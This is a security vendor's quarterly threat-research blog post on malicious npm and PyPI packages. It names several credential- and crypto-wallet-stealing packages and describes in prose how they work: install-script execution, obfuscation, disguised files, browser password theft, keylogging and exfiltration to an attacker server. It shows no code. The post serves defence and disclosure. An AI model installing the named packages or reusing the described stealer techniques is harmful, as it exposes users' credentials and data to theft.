In this previous blog, Fortiguard Labs highlighted a growing trend in the use of open source software (OSS) repositories as channels for malware distribution in supply chain security. With the continued reliance on third-party packages in development workflows, threat actors are increasingly exploiting vulnerabilities in the open-source ecosystem to propagate malicious code, exfiltrate data, and cause other harm.

By leveraging our proprietary AI-powered malware detection and continuous monitoring system, FortiGuard Labs has established real-time tracking and detection of newly published packages. This ongoing, global monitoring enables us to rapidly identify emerging threats and evolving attack techniques.

During the quarter, our automated threat detection platform scanned over 1.4 million NPM (Node Package Manager) and 400,000 PyPI (Python Package Index) packages, uncovering a substantial number of malicious packages. A significant portion of these packages highlighted data exfiltration as one of the most common malicious behaviors utilizing setup or install scripts, reaffirming the persistence of threat patterns and trends observed in our previous blog.

As shown in the statistics above, based on over a thousand analyst-confirmed malicious packages, the high percentage of low file counts, missing repositories, and the use of install scripts suggests that malware authors aim to minimize their code footprint, reduce traceability, and silently deploy malicious payloads during the installation process. We also observed an increase in the use of obfuscation compared to the previous quarter.

To provide a closer look, here are a couple of examples from our Q2 findings:

Malicious Python Packages Steal Credentials and Wallets Targets

Several malicious PyPI packages were discovered in Q2, namely simple-mali-pkg-0.1.0, confighum-0.3.5, sinontop-utils-0.3.5, solana-sdkpy-1.2.5, and solana-sdkpy-1.2.6, which serve as strong examples of the tactics reflected in our statistical findings. They employ several common techniques used by threat actors, including install script execution, command overwriting, a low file count, absence of a linked repository, code encryption or obfuscation aimed at evading the true nature of the code, and executing malicious behavior during installation.

Figure 1: setup.py of simple-mali-pkg-0.1.0

Figure 2: mali.py of simple-mali-pkg-0.1.0

Figure 3: Decrypted mali.py indicating the stealing of personal data and wallets

NPM Malware Package Follows Suit – Obfuscated Code Used to Steal Data

This NPM package example demonstrates similar malicious behavior of data theft and exfiltration. A package, postcss-theme-vars-7.0.7, while differing in implementation, shares similar core behaviors with simple-mali-pkg-0.1.0. In this package, the malicious code resides in a file named test-simples.dat, a possible attempt at misdirection, as the extension conceals the fact that the content is JavaScript. This file also contains a large amount of obfuscated code. At the beginning of last quarter, Socket reported a similarly named package that impersonated the legitimate PostCSS library. Since that disclosure, the threat persists but is now resurfacing with variations in its code. This highlights the ongoing persistence of data theft campaigns within open source ecosystems.

Figure 4: test-samples.dat of postcss-theme-vars-7.0.7

Figure 5: This code snippet makes a socket connection to the attacker-controlled remote server

Figure 6: This code snippet targets Chrome and Brave browser profiles and collects saved passwords, autofill data, and extension settings

Figure 7: This code snippet silently scans the victim's computer for sensitive files for exfiltration

Figure 8: This code snippet logs keyboard input, monitors clipboards, and takes screenshots

Conclusion

The findings from our Q2 2025 data analysis reinforce the observations we made in the previous quarter. The abuse of OSS repos to propagate malware remains persistent. While overall tactics have not evolved significantly, attackers continue to rely on proven techniques, such as minimizing file count, using installation scripts, and employing discreet data exfiltration methods that maximize impact.

A continued rise in obfuscation also further notes the importance of vigilance and ongoing monitoring required by users of these services. And as OSS continues to grow, so too will the attack surface for supply chain threats.

It is highly recommended that organizations and individuals strengthen their defenses with knowledge and awareness of OSS supply chain threats. This is an essential first step toward effectively mitigating or preventing potential risks.

Fortinet Protections

FortiGuard AntiVirus detects the malicious files identified in this report as

simple-mali-pkg-0.1.0: Python/FreeCodingTools.10037449!tr
confighum-0.3.5: Python/FreeCodingTools.10037449!tr
sinontop-utils-0.3.5: Python/FreeCodingTools.10037449!tr
solana-sdkpy-1.2.5: Python/FreeCodingTools.10037449!tr
solana-sdkpy-1.2.6: Python/FreeCodingTools.10037449!tr
postcss-theme-vars-7.0.7: JS/Stealer.A!tr

The FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. Customers running current AntiVirus updates are protected.

The FortiGuard Web Filtering Service detects and blocks the download URLs cited in this report as Malicious.

The FortiDevSec SCA scanner detects malicious packages, including those cited in this report that may operate as dependencies in users' projects in test phases, and prevents those dependencies from being introduced into users' products.

If you believe these or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard Incident Response Team.

IOCs